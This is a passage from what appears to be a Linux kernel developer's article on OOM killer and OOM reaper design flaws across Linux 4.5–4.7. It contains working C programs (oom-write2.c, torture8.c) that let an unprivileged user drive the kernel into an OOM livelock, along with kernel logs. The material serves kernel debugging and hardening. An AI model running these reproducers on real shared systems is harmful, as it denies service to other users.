If mmap_sem was successfully held in shared mode, the current thread performs the core dump operation if needed. Then, the current thread releases the mm_struct and mmap_sem. But there is no guarantee that memory is reclaimed as free memory immediately after releasing the mm_struct. If the current thread is one of the threads of a multi-threaded program, the memory cannot be reclaimed as free memory until all threads using that mm_struct have released it. Thus, mmput(current->mm) is called in order to release only the reference to the mm_struct used by the current thread. Upon returning from mmput(current->mm), the TIF_MEMDIE flag is cleared, because the memory which can be reclaimed is considered to have been reclaimed, and the OOM killer can start selecting other threads. mmput() decrements a refcount, and performs the memory reclaim operation only when that refcount drops to 0. And the memory reclaim operation includes operations (such as waiting for completion of asynchronous I/O) which can be blocked by memory allocation requests. In the window where the mm_struct has been released but the TIF_MEMDIE flag has not yet been cleared, threads doing memory allocation requests fall into the (Trap 2) situation where the OOM killer cannot be invoked, due to the behavior explained at (kill5). Since it is considered that there is still reclaimable memory until the exiting thread returns from mmput(), allocating threads do not want to invoke the OOM killer. But this is a blank period in which allocating threads cannot know that we are in a situation where no forward progress can be made without invoking the OOM killer. |
(exit5) |
After returning from exit_mm(), the rest of the cleanup operations, such as closing file descriptors, are performed. Since the mm_struct was already released, the behavior explained at (kill2) is no longer applied; if memory allocation requests caused by the rest of the cleanup operations invoke the OOM killer, the OOM killer selects other threads. |
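Since the (Trap 3) interplay on mmap_sem is the hardest to see from prose alone, here is the sketch promised above (a simplification of the exit_mm() and mmap() paths; error handling and details are omitted):
---------- sketch: (Trap 3) on mmap_sem ----------
/* thread-A: already has PF_EXITING, inside exit_mm(). */
static void exit_mm_sketch(void)
{
	/*
	 * Unkillable wait: cannot proceed until thread-B below releases
	 * mmap_sem, which it holds in exclusive mode.
	 */
	down_read(&current->mm->mmap_sem);
	/* ... core dump handling, then release the mm_struct ... */
	up_read(&current->mm->mmap_sem);
}

/* thread-B: the mmap() path in the same process. */
static void mmap_sketch(void)
{
	struct page *page;

	down_write(&current->mm->mmap_sem);
	/*
	 * This allocation request invokes the OOM killer. The OOM killer
	 * sees thread-A's PF_EXITING, assumes the mm_struct is about to
	 * be released, and aborts (OOM_SCAN_ABORT) instead of selecting
	 * a new victim. But thread-A is waiting for us: OOM livelock.
	 */
	page = alloc_page(GFP_KERNEL);
	up_write(&current->mm->mmap_sem);
}
---------- sketch: (Trap 3) on mmap_sem ----------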
What did you think? The exclusion control which the OOM killer uses in order "not to kill more processes than necessary" did not take race conditions with other threads into account, and did not consider cases where the threads which are expected to release the mm_struct are blocked. What an optimistic approach!
Therefore, introducing the OOM reaper, which handles the cases where the threads expected to release the mm_struct are blocked, became the solution for the OOM livelock problem in the case where the OOM killer could be invoked.
The OOM reaper, which was discussed at the LSF/MM summit held in March 2015 and was introduced in Linux 4.6, reduces the possibility of falling into the OOM livelock situation by reclaiming the memory used by a thread group which was terminated by the OOM killer, before the mm_struct used by that thread group is released.
Now, I explain the flow of the OOM killer as of Linux 4.6.
(kill1) | Same as (kill1) of Linux 4.5; omitted. |
(kill2) | Same as (kill2) of Linux 4.5; omitted. |
(kill3) | Same as (kill3) of Linux 4.5; omitted. |
(kill4) | Same as (kill4) of Linux 4.5; omitted. |
(kill5) | oom_scan_process_thread() determines whether that thread can become a candidate for forced termination by the OOM killer. In order to close the blank period which can cause the OOM livelock situation, the processing for the task_will_free_mem(task) case inside oom_scan_process_thread() was removed. Otherwise it is the same as (kill5) of Linux 4.5. |
(kill6) | Same as (kill6) of Linux 4.5; omitted. |
(kill7) | Same as (kill7) of Linux 4.5; omitted. |
(kill8) | Same as (kill8) of Linux 4.5; omitted. |
(kill9) | Same as (kill9) of Linux 4.5; omitted. |
(kill10) | The OOM killer also sends the SIGKILL signal to the other thread groups which use the mm_struct of the thread being forcibly terminated, if they are thread groups which are suitable for forced termination by the OOM killer. And if all thread groups using that mm_struct are thread groups which are suitable for forced termination by the OOM killer, the OOM reaper is invoked. |
(kill11) | The OOM reaper tries to acquire mmap_sem in shared mode. Only when the acquisition succeeded, it releases the releasable pages among the memory contained in that mm_struct, and then releases mmap_sem. The processing of mmput(), which is called when all threads have released the mm_struct, is not performed; but since the reclaimable memory can be regarded as mostly reclaimed, when the OOM reaper was able to operate normally (i.e. was able to acquire mmap_sem in shared mode), it clears the TIF_MEMDIE flag and sets oom_score_adj to -1000 so that the thread group containing that thread will not be selected by the OOM killer again. (Trap 7) (A sketch of this processing follows after this list.) |
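The core of the OOM reaper, condensed from the idea of __oom_reap_task() in mm/oom_kill.c as of Linux 4.6 (the reaper kernel thread, retries and the page-table teardown details are omitted; unmap_vma_pages() is a hypothetical helper):
---------- sketch: OOM reaper core (Linux 4.6) ----------
static bool oom_reap_task_sketch(struct task_struct *tsk)
{
	struct mm_struct *mm = tsk->mm;
	struct vm_area_struct *vma;

	/* Only try shared mode; if some thread holds mmap_sem in
	 * exclusive mode, give up instead of blocking. */
	if (!down_read_trylock(&mm->mmap_sem))
		return false;

	/* Tear down private anonymous mappings. File-backed and shared
	 * mappings are left alone. */
	for (vma = mm->mmap; vma; vma = vma->vm_next)
		if (vma_is_anonymous(vma) && !(vma->vm_flags & VM_SHARED))
			unmap_vma_pages(vma);	/* hypothetical helper */

	up_read(&mm->mmap_sem);

	/* (Trap 7): let the OOM killer pick the next victim, and keep
	 * this thread group from being picked again. */
	exit_oom_victim(tsk);				/* clears TIF_MEMDIE */
	tsk->signal->oom_score_adj = OOM_SCORE_ADJ_MIN;	/* -1000 */
	return true;
}
---------- sketch: OOM reaper core (Linux 4.6) ----------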
The flow of terminating a thread is the same as in Linux 4.5, and is therefore omitted.
(Trap 7) is a location where the system can fall into the OOM livelock situation. But why can it become a trap?
First, the reason why the OOM reaper clears TIF_MEMDIE.
The OOM killer makes the process consuming the largest amount of memory (after taking the oom_score_adj value into account) the candidate for forced termination; but, as explained at (kill8), if there is a child process which is suitable for forced termination by the OOM killer, that child process is selected. And no matter how much memory the parent process consumes, the child process's memory consumption can be nearly 0. For example, if we let the OOM killer select a child process whose memory consumption is nearly 0, as shown below, the OOM reaper can reclaim almost no memory.
---------- oom-write.c ----------
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
	unsigned long size;
	char *buf = NULL;
	unsigned long i;
	/* Spawn 10 tiny children which append to /tmp/file via ./write . */
	for (i = 0; i < 10; i++) {
		if (fork() == 0) {
			close(1);
			open("/tmp/file", O_WRONLY | O_CREAT | O_APPEND, 0600);
			execl("./write", "./write", NULL);
			_exit(1);
		}
	}
	/* Grab as much virtual memory as possible. */
	for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
		char *cp = realloc(buf, size);
		if (!cp) {
			size >>= 1;
			break;
		}
		buf = cp;
	}
	sleep(5);
	/* Will cause OOM due to overcommit */
	for (i = 0; i < size; i += 4096)
		buf[i] = 0;
	pause();
	return 0;
}
---------- oom-write.c ----------
---------- write.asm ----------
; nasm -f elf write.asm && ld -s -m elf_i386 -o write write.o
section .text
CPU 386
global _start
_start:
	; while (write(1, buf, 4096) == 4096);
	mov eax, 4		; NR_write
	mov ebx, 1
	mov ecx, _start - 96
	mov edx, 4096
	int 0x80
	cmp eax, 4096
	je _start
	; pause();
	mov eax, 29		; NR_pause
	int 0x80
	; _exit(0);
	mov eax, 1		; NR_exit
	mov ebx, 0
	int 0x80
---------- write.asm ----------
---------- Example output start ---------- [ 78.157198] oom-write invoked oom-killer: order=0, oom_score_adj=0, gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|GFP_ZERO) (...snipped...) [ 78.325409] [ 3805] 1000 3805 541715 357876 708 6 0 0 oom-write [ 78.327978] [ 3806] 1000 3806 39 1 3 2 0 0 write [ 78.330149] [ 3807] 1000 3807 39 1 3 2 0 0 write [ 78.332167] [ 3808] 1000 3808 39 1 3 2 0 0 write [ 78.334488] [ 3809] 1000 3809 39 1 3 2 0 0 write [ 78.336471] [ 3810] 1000 3810 39 1 3 2 0 0 write [ 78.338414] [ 3811] 1000 3811 39 1 3 2 0 0 write [ 78.340709] [ 3812] 1000 3812 39 1 3 2 0 0 write [ 78.342711] [ 3813] 1000 3813 39 1 3 2 0 0 write [ 78.344727] [ 3814] 1000 3814 39 1 3 2 0 0 write [ 78.346613] [ 3815] 1000 3815 39 1 3 2 0 0 write [ 78.348829] Out of memory: Kill process 3805 (oom-write) score 808 or sacrifice child [ 78.350818] Killed process 3806 (write) total-vm:156kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB [ 78.455314] oom-write invoked oom-killer: order=0, oom_score_adj=0, gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|GFP_ZERO) (...snipped...) [ 78.631333] [ 3805] 1000 3805 541715 361440 715 6 0 0 oom-write [ 78.633802] [ 3807] 1000 3807 39 1 3 2 0 0 write [ 78.635977] [ 3808] 1000 3808 39 1 3 2 0 0 write [ 78.638325] [ 3809] 1000 3809 39 1 3 2 0 0 write [ 78.640463] [ 3810] 1000 3810 39 1 3 2 0 0 write [ 78.642837] [ 3811] 1000 3811 39 1 3 2 0 0 write [ 78.644924] [ 3812] 1000 3812 39 1 3 2 0 0 write [ 78.646990] [ 3813] 1000 3813 39 1 3 2 0 0 write [ 78.649039] [ 3814] 1000 3814 39 1 3 2 0 0 write [ 78.651242] [ 3815] 1000 3815 39 1 3 2 0 0 write [ 78.653326] Out of memory: Kill process 3805 (oom-write) score 816 or sacrifice child [ 78.655235] Killed process 3807 (write) total-vm:156kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB [ 88.776446] MemAlloc-Info: 1 stalling task, 1 dying task, 1 victim task. [ 88.778228] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=10000 [ 88.780158] MemAlloc: write(3807) uninterruptible dying victim (...snipped...) [ 98.915687] MemAlloc-Info: 8 stalling task, 1 dying task, 1 victim task. [ 98.917888] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=14885 uninterruptible [ 98.920297] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=20139 [ 98.922652] MemAlloc: irqbalance(1710) seq=3 gfp=0x24280ca order=0 delay=16231 [ 98.924874] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=20044 [ 98.927043] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=10230 uninterruptible [ 98.929405] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=14716 [ 98.931559] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=14887 [ 98.933843] MemAlloc: write(3806) seq=29813 gfp=0x2400240 order=0 delay=14887 uninterruptible exiting [ 98.936460] MemAlloc: write(3807) uninterruptible dying victim (...snipped...) [ 140.356230] MemAlloc-Info: 9 stalling task, 1 dying task, 1 victim task. 
[ 140.358448] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=56326 uninterruptible [ 140.360979] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=61580 uninterruptible [ 140.363716] MemAlloc: irqbalance(1710) seq=3 gfp=0x24280ca order=0 delay=57672 [ 140.365983] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=61485 uninterruptible [ 140.368521] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=51671 uninterruptible [ 140.371128] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=56157 uninterruptible [ 140.373548] MemAlloc: smbd(3734) seq=1 gfp=0x27000c0 order=2 delay=48147 [ 140.375722] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=56328 uninterruptible [ 140.378647] MemAlloc: write(3806) seq=29813 gfp=0x2400240 order=0 delay=56328 exiting [ 140.381695] MemAlloc: write(3807) uninterruptible dying victim (...snipped...) [ 150.493557] MemAlloc-Info: 7 stalling task, 1 dying task, 1 victim task. [ 150.495725] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=66463 [ 150.497897] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=71717 uninterruptible [ 150.500490] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=71622 uninterruptible [ 150.502940] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=61808 [ 150.505122] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=66294 uninterruptible [ 150.507521] MemAlloc: smbd(3734) seq=1 gfp=0x27000c0 order=2 delay=58284 [ 150.509678] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=66465 uninterruptible [ 150.512333] MemAlloc: write(3807) uninterruptible dying victim ---------- Example output end ----------
Therefore, if the OOM reaper could not reclaim an amount of memory sufficient to resolve the OOM situation, the system would fall into the OOM livelock situation. In order to avoid this, TIF_MEMDIE is cleared after the memory has been reclaimed, so that the OOM killer can select the next victim.
Next, the reason why the OOM reaper sets oom_score_adj to -1000.
Even after the OOM reaper has reclaimed the memory of the child process selected by the OOM killer, that child process keeps being selected by the OOM killer until it releases its mm_struct. Even if the OOM killer selects a process whose reclaimable memory has already been reclaimed, the OOM reaper cannot reclaim anything more, and the system falls into the OOM livelock situation. In order to avoid this, -1000 is set. (Trap 8)
However, this behavior created a new trap: an OOM livelock situation which could not be triggered with a normal user's privileges up to Linux 4.5 can now be triggered with a normal user's privileges in Linux 4.6. Have you noticed in which cases (Trap 8) will be stepped on? The hint is "a perverse use of multi-threading".
If CLONE_VM is specified but CLONE_SIGHAND is not specified for the clone() system call, a thread group is created which references the same mm_struct yet has its own, different /proc/$pid/oom_score_adj .
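A minimal, runnable demonstration of just this mechanism (the file name clone-vm.c is mine; the full attack follows below): the parent and the cloned child share one mm_struct but print different tgids, and each tgid has its own /proc/$pid/oom_score_adj file.
---------- clone-vm.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>

static int child(void *unused)
{
	/* Shares the parent's mm_struct, but belongs to a new thread
	 * group, with its own /proc/$pid/oom_score_adj . */
	printf("child  tgid=%d\n", getpid());
	sleep(10);
	return 0;
}

int main(void)
{
	char *stack = malloc(65536);

	printf("parent tgid=%d\n", getpid());
	/* CLONE_VM without CLONE_SIGHAND (and hence without CLONE_THREAD):
	 * same memory, different thread group. */
	clone(child, stack + 65536, CLONE_VM, NULL);
	sleep(10);
	return 0;
}
---------- clone-vm.c ----------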
The OOM killer sets TIF_MEMDIE on only one thread among all the threads referencing the same mm_struct. And the OOM reaper, at the same time as it clears TIF_MEMDIE from that thread, sets to -1000 only the oom_score_adj of the thread group containing that thread.
As a result, it became possible to create a "super-perverse multi-threaded program" in which, among the thread groups referencing the same mm_struct, exactly one is in the state "not suitable for forced termination by the OOM killer / not suitable for memory reclaim by the OOM reaper" while all the others are in the state "suitable for forced termination by the OOM killer".
---------- oom-write2.c ----------
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>

static int writer(void *unused)
{
	static char buffer[4096];
	int fd = open("/tmp/file", O_WRONLY | O_CREAT | O_APPEND, 0600);
	while (write(fd, buffer, sizeof(buffer)) == sizeof(buffer));
	return 0;
}

int main(int argc, char *argv[])
{
	unsigned long size;
	char *buf = NULL;
	unsigned long i;
	if (fork() == 0) {
		int fd = open("/proc/self/oom_score_adj", O_WRONLY);
		write(fd, "1000", 4);
		close(fd);
		for (i = 0; i < 2; i++) {
			char *stack = malloc(4096);
			if (stack)
				clone(writer, stack + 4096, CLONE_VM, NULL);
		}
		writer(NULL);
		while (1)
			pause();
	}
	sleep(1);
	for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
		char *cp = realloc(buf, size);
		if (!cp) {
			size >>= 1;
			break;
		}
		buf = cp;
	}
	sleep(5);
	/* Will cause OOM due to overcommit */
	for (i = 0; i < size; i += 4096)
		buf[i] = 0;
	pause();
	return 0;
}
---------- oom-write2.c ----------
---------- Example output start ---------- [ 177.722853] a.out invoked oom-killer: gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|__GFP_ZERO), order=0, oom_score_adj=0 [ 177.724956] a.out cpuset=/ mems_allowed=0 [ 177.725735] CPU: 3 PID: 3962 Comm: a.out Not tainted 4.5.0-rc2-next-20160204 #291 (...snipped...) [ 177.802889] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name (...snipped...) [ 177.872248] [ 3941] 1000 3941 28880 124 14 3 0 0 bash [ 177.874279] [ 3962] 1000 3962 541717 395780 784 6 0 0 a.out [ 177.876274] [ 3963] 1000 3963 1078 21 7 3 0 1000 a.out [ 177.878261] [ 3964] 1000 3964 1078 21 7 3 0 1000 a.out [ 177.880194] [ 3965] 1000 3965 1078 21 7 3 0 1000 a.out [ 177.882262] Out of memory: Kill process 3963 (a.out) score 998 or sacrifice child [ 177.884129] Killed process 3963 (a.out) total-vm:4312kB, anon-rss:84kB, file-rss:0kB, shmem-rss:0kB [ 177.887100] oom_reaper: reaped process :3963 (a.out) anon-rss:0kB, file-rss:0kB, shmem-rss:0lB [ 179.638399] crond invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0 [ 179.647708] crond cpuset=/ mems_allowed=0 [ 179.652996] CPU: 3 PID: 742 Comm: crond Not tainted 4.5.0-rc2-next-20160204 #291 (...snipped...) [ 179.771311] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name (...snipped...) [ 179.836221] [ 3941] 1000 3941 28880 124 14 3 0 0 bash [ 179.838278] [ 3962] 1000 3962 541717 396308 785 6 0 0 a.out [ 179.840328] [ 3963] 1000 3963 1078 0 7 3 0 -1000 a.out [ 179.842443] [ 3965] 1000 3965 1078 0 7 3 0 1000 a.out [ 179.844557] Out of memory: Kill process 3965 (a.out) score 998 or sacrifice child [ 179.846404] Killed process 3965 (a.out) total-vm:4312kB, anon-rss:0kB, file-rss:0kB, shmem-rss:0kB ---------- Example output end ----------
As a result, the thread group which was marked as already reaped by the first invocation of the OOM reaper no longer receives the second and subsequent invocations of the OOM reaper, and since nobody clears the TIF_MEMDIE flag, the system fell into the OOM livelock situation.
If (kill10) had also checked whether the SIGKILL signal has already been received when judging whether a thread group is suitable for forced termination by the OOM killer, the OOM reaper could have been invoked and the system would not have fallen into the OOM livelock situation.
Learning from this, Linux 4.7 was changed to set a flag named MMF_OOM_REAPED on the mm_struct instead of setting the oom_score_adj of all thread groups to -1000. As this shows, for processing under an OOM situation, where we cannot predict what will happen, it is important to always assume and prepare for the worst case.
Now, I explain the flow of the OOM killer as of Linux 4.7.
(kill1) |
out_of_memory() (the OOM killer) is called when a memory allocation request of order 3 or less, or a memory allocation request containing the __GFP_NOFAIL flag, was made but free memory could not be found (an OOM situation occurred). |
(kill2) | If the current thread has already received the SIGKILL signal, or the thread group containing the current thread is already terminating (has the SIGNAL_GROUP_EXIT flag set), the TIF_MEMDIE flag is set on the current thread in order not to kill more processes than necessary, because free memory may be produced when the thread group containing the current thread releases its mm_struct. Also, if all thread groups using that mm_struct are terminating, the OOM reaper is invoked. After that, control returns to the caller. If the memory allocation request contains neither the __GFP_FS flag nor the __GFP_NOFAIL flag, nothing is done and control returns to the caller. |
(kill3) | Same as (kill3) of Linux 4.5; omitted. |
(kill4) | select_bad_process() calls oom_scan_process_thread() on all thread groups which exist in the system. Otherwise it is the same as (kill4) of Linux 4.5. |
(kill5) | oom_scan_process_thread() determines whether that thread group can become a candidate for forced termination by the OOM killer. The check for the TIF_MEMDIE flag is now performed not per thread but per thread group containing that thread. Otherwise it is the same as (kill5) of Linux 4.6. |
(kill6) | oom_badness() evaluates how much that thread is contributing to the OOM situation. When judging whether forced termination is appropriate, not only whether the oom_score_adj value is -1000 but also the presence of the MMF_OOM_REAPED flag is now checked (see the sketch after this list). Otherwise it is the same as (kill6) of Linux 4.5. |
(kill7) | Same as (kill7) of Linux 4.5; omitted. |
(kill8) | oom_kill_process() does the job of forced termination by actually sending the SIGKILL signal. Firstly, if the thread group is already terminating, the TIF_MEMDIE flag is set on that thread in order not to kill more processes than necessary, because free memory may be produced when that thread group releases its mm_struct. Also, if all thread groups using that mm_struct are terminating, the OOM reaper is invoked. After that, control returns to the caller. |
(kill9) | Same as (kill9) of Linux 4.5; omitted. |
(kill10) | Same as (kill10) of Linux 4.6; omitted. |
(kill11) | When mmap_sem was successfully acquired, the MMF_OOM_REAPED flag is set on that mm_struct instead of setting oom_score_adj to -1000. Otherwise it is the same as (kill11) of Linux 4.6. |
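The (kill6) check promised above reads roughly as follows (condensed from the idea of oom_badness() in mm/oom_kill.c as of Linux 4.7; the scoring helper is hypothetical):
---------- sketch: oom_badness() check (Linux 4.7) ----------
static unsigned long oom_badness_sketch(struct task_struct *p)
{
	if (p->signal->oom_score_adj == OOM_SCORE_ADJ_MIN)
		return 0;	/* the administrator forbade killing it */
	if (test_bit(MMF_OOM_REAPED, &p->mm->flags))
		return 0;	/* already reaped: killing it frees nothing more */
	return score_from_memory_usage(p);	/* hypothetical helper */
}
---------- sketch: oom_badness() check (Linux 4.7) ----------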
As of Linux 4.6, it was possible to cause the OOM livelock situation by using mmap() to generate contention on down_write(&mm->mmap_sem) and thereby obstruct the operation of the OOM reaper. Therefore, in Linux 4.7, down_write_killable() was introduced and down_write(&mm->mmap_sem) was replaced with down_write_killable(&mm->mmap_sem), which considerably reduced the possibility of becoming stuck at down_read(&mm->mmap_sem) inside exit_mm().
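The shape of that change, as a sketch (the surrounding function is illustrative; down_write_killable() itself is the real Linux 4.7 API, returning 0 on success and -EINTR when a fatal signal is pending):
---------- sketch: down_write_killable() (Linux 4.7) ----------
static int do_something_with_mm(struct mm_struct *mm)
{
	/* Up to Linux 4.6 this was down_write(&mm->mmap_sem): an
	 * unkillable wait. Since Linux 4.7, a pending fatal signal
	 * (e.g. SIGKILL from the OOM killer) makes it return -EINTR,
	 * so an OOM victim stuck here can back out, reach exit_mm(),
	 * and release its memory. */
	if (down_write_killable(&mm->mmap_sem))
		return -EINTR;
	/* ... the critical section ... */
	up_write(&mm->mmap_sem);
	return 0;
}
---------- sketch: down_write_killable() (Linux 4.7) ----------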
Even so, the possibility remains of becoming stuck in an unkillable wait between down_write_killable(&mm->mmap_sem) and up_write(&mm->mmap_sem). For example, it occurs when a program like the following is executed.
---------- torture8.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/mman.h>

static int memory_eater(void *unused)
{
	const int fd = open("/proc/self/exe", O_RDONLY);
	srand(getpid());
	while (1) {
		int size = rand() % 1048576;
		void *ptr = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0);
		munmap(ptr, size);
	}
	return 0;
}

static int self_killer(void *unused)
{
	srand(getpid());
	poll(NULL, 0, rand() % 1000);
	kill(getpid(), SIGKILL);
	return 0;
}

static void child(void)
{
	static char *stack[256] = { };
	char buf[32] = { };
	int i;
	int fd = open("/proc/self/oom_score_adj", O_WRONLY);
	write(fd, "1000", 4);
	close(fd);
	snprintf(buf, sizeof(buf), "tgid=%u", getpid());
	prctl(PR_SET_NAME, (unsigned long) buf, 0, 0, 0);
	for (i = 0; i < 256; i++)
		stack[i] = malloc(4096 * 2);
	for (i = 1; i < 256 - 2; i++)
		if (clone(memory_eater, stack[i] + 8192, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1)
			_exit(1);
	if (clone(memory_eater, stack[i++] + 8192, CLONE_VM, NULL) == -1)
		_exit(1);
	if (clone(self_killer, stack[i] + 8192, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1)
		_exit(1);
	_exit(0);
}

int main(int argc, char *argv[])
{
	static cpu_set_t set = { { 1 } };
	sched_setaffinity(0, sizeof(set), &set);
	if (fork() > 0) {
		char *buf = NULL;
		unsigned long size;
		unsigned long i;
		sleep(1);
		for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
			char *cp = realloc(buf, size);
			if (!cp) {
				size >>= 1;
				break;
			}
			buf = cp;
		}
		/* Will cause OOM due to overcommit */
		for (i = 0; i < size; i += 4096)
			buf[i] = 0;
		while (1)
			pause();
	}
	while (1)
		if (fork() == 0)
			child();
		else
			wait(NULL);
	return 0;
}
---------- torture8.c ----------
---------- Example output start ---------- [ 156.182149] oom_reaper: reaped process 13333 (tgid=13079), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 157.113150] oom_reaper: reaped process 4372 (tgid=4118), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 157.995910] oom_reaper: reaped process 11029 (tgid=10775), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 158.181043] oom_reaper: reaped process 11285 (tgid=11031), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 169.049766] oom_reaper: reaped process 11541 (tgid=11287), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 169.323695] oom_reaper: reaped process 11797 (tgid=11543), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 176.294340] oom_reaper: reaped process 12309 (tgid=12055), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 240.458346] MemAlloc-Info: stalling=16 dying=1 exiting=1 victim=0 oom_count=729 [ 241.950461] MemAlloc-Info: stalling=16 dying=1 exiting=1 victim=0 oom_count=729 [ 301.956044] MemAlloc-Info: stalling=19 dying=1 exiting=1 victim=0 oom_count=729 [ 303.654382] MemAlloc-Info: stalling=19 dying=1 exiting=1 victim=0 oom_count=729 [ 349.771068] oom_reaper: reaped process 13589 (tgid=13335), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 349.996636] oom_reaper: reaped process 13845 (tgid=13591), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 350.704767] oom_reaper: reaped process 14357 (tgid=14103), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 351.656833] Out of memory: Kill process 5652 (tgid=5398) score 999 or sacrifice child [ 351.659127] Killed process 5652 (tgid=5398) total-vm:6348kB, anon-rss:1116kB, file-rss:12kB, shmem-rss:0kB [ 352.664419] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 357.238418] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 358.621747] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 359.970605] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 361.423518] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 362.704023] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 363.832115] MemAlloc-Info: stalling=1 dying=3 exiting=1 victim=1 oom_count=25279 [ 364.148948] MemAlloc: tgid=5398(5652) flags=0x400040 switches=266 dying victim [ 364.150851] tgid=5398 R running task 12920 5652 1 0x00100084 [ 364.152773] ffff88000637fbe8 ffffffff8172b257 000091fa78a0caf8 ffff8800389de440 [ 364.154843] ffff880006376440 ffff880006380000 ffff880078a0caf8 ffff880078a0caf8 [ 364.156898] ffff880078a0cb10 ffff880078a0cb00 ffff88000637fc00 ffffffff81725e1a [ 364.158972] Call Trace: [ 364.159979] [<ffffffff8172b257>] ? _raw_spin_unlock_irq+0x27/0x50 [ 364.161691] [<ffffffff81725e1a>] schedule+0x3a/0x90 [ 364.163170] [<ffffffff8172a366>] rwsem_down_write_failed+0x106/0x220 [ 364.164925] [<ffffffff813bd2c7>] call_rwsem_down_write_failed+0x17/0x30 [ 364.166737] [<ffffffff81729877>] down_write+0x47/0x60 [ 364.168258] [<ffffffff811c3284>] ? vma_link+0x44/0xc0 [ 364.169773] [<ffffffff811c3284>] vma_link+0x44/0xc0 [ 364.171255] [<ffffffff811c5c05>] mmap_region+0x3a5/0x5b0 [ 364.172822] [<ffffffff811c6204>] do_mmap+0x3f4/0x4c0 [ 364.174324] [<ffffffff811a64dc>] vm_mmap_pgoff+0xbc/0x100 [ 364.175894] [<ffffffff811c4060>] SyS_mmap_pgoff+0x1c0/0x290 [ 364.177499] [<ffffffff81002c91>] ? 
do_syscall_64+0x21/0x170 [ 364.179118] [<ffffffff81022b7d>] SyS_mmap+0x1d/0x20 [ 364.180592] [<ffffffff81002ccc>] do_syscall_64+0x5c/0x170 [ 364.182140] [<ffffffff8172b9da>] entry_SYSCALL64_slow_path+0x25/0x25 [ 364.183855] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 365.199023] MemAlloc-Info: stalling=1 dying=3 exiting=1 victim=1 oom_count=28254 [ 366.283955] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 368.158264] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 369.568325] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 371.416533] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 373.159185] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 374.835808] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 376.386226] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 378.223962] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 379.601584] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 381.067290] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 382.394818] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 383.918460] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 385.540088] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 386.915094] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 388.297575] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 391.598638] oom_reaper: unable to reap pid:5652 